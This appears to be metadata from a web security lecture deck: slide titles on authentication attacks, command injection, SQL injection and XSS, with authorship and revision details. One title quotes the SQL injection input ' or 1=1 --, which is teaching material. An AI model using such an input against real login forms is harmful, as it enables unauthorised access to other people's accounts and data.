      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Referer Header</vt:lpstr>
      <vt:lpstr>Referer to Control Access</vt:lpstr>
      <vt:lpstr>HTML Forms Input Restrictions</vt:lpstr>
      <vt:lpstr>Definitions</vt:lpstr>
      <vt:lpstr>Attacking Authentication</vt:lpstr>
      <vt:lpstr>Eavesdropping  Credentials and Authenticators</vt:lpstr>
      <vt:lpstr>Brute-forcing  Credentials and Authenticators</vt:lpstr>
      <vt:lpstr>Bypassing Authentication</vt:lpstr>
      <vt:lpstr>Session Fixation</vt:lpstr>
      <vt:lpstr>Session Fixation</vt:lpstr>
      <vt:lpstr>Session Fixation</vt:lpstr>
      <vt:lpstr>Authorization Attacks</vt:lpstr>
      <vt:lpstr>Authorization Attacks</vt:lpstr>
      <vt:lpstr>PHP register_global</vt:lpstr>
      <vt:lpstr>PHP – register_globals</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Server (Mis)Configuration:  Unexpected Interactions</vt:lpstr>
      <vt:lpstr>Mixing Code and Data in Web Applications</vt:lpstr>
      <vt:lpstr>OS Command Injection Attacks</vt:lpstr>
      <vt:lpstr>OS Command Injection Attacks</vt:lpstr>
      <vt:lpstr>Preventing OS Command Injection</vt:lpstr>
      <vt:lpstr>File Inclusion Attacks</vt:lpstr>
      <vt:lpstr>File Inclusion in PHP</vt:lpstr>
      <vt:lpstr>SQL Injection Example</vt:lpstr>
      <vt:lpstr>The Form</vt:lpstr>
      <vt:lpstr>The Login Script</vt:lpstr>
      <vt:lpstr>The Database</vt:lpstr>
      <vt:lpstr>The [' or 1=1 --] Technique</vt:lpstr>
      <vt:lpstr>Injecting SQL Into Different Types of Queries</vt:lpstr>
      <vt:lpstr>Inject Different Queries</vt:lpstr>
      <vt:lpstr>Identifying SQL Injection</vt:lpstr>
      <vt:lpstr>The UNION Operator</vt:lpstr>
      <vt:lpstr>Determining Number and Type of  Query Parameters</vt:lpstr>
      <vt:lpstr>Determining Table and Column Names</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Second Order SQL Injection</vt:lpstr>
      <vt:lpstr>register.php</vt:lpstr>
      <vt:lpstr>change_password.php</vt:lpstr>
      <vt:lpstr>SQL Injection Solutions</vt:lpstr>
      <vt:lpstr>SQL Injection – Prevention</vt:lpstr>
      <vt:lpstr>SQL Injection Solutions: Stored Procedures</vt:lpstr>
      <vt:lpstr>SQL Injection Solutions: Stored Procedures</vt:lpstr>
      <vt:lpstr>SQL Injection Solutions: Prepared Statements</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reflected Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Steal Login Data</vt:lpstr>
      <vt:lpstr>Reflected Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Simple XSS Example</vt:lpstr>
      <vt:lpstr>Stored Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Executing JavaScript</vt:lpstr>
      <vt:lpstr>DOM-based XSS</vt:lpstr>
      <vt:lpstr>Client-Side XSS Example</vt:lpstr>
      <vt:lpstr>Client-Side XSS Example</vt:lpstr>
      <vt:lpstr>Client-Side XSS Example</vt:lpstr>
      <vt:lpstr>Client-Side XSS Example</vt:lpstr>
      <vt:lpstr>Client-Side XSS Example</vt:lpstr>
      <vt:lpstr>Wormable XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</vt:lpstr>
      <vt:lpstr>Solutions to XSS</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Adam Doupé</cp:lastModifiedBy>
  <cp:revision>2369</cp:revision>
  <cp:lastPrinted>2011-10-05T20:20:50Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-09-20T20:28:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-26T23:33:51Z</dcterms:modified>
</cp:coreProperties>
</file>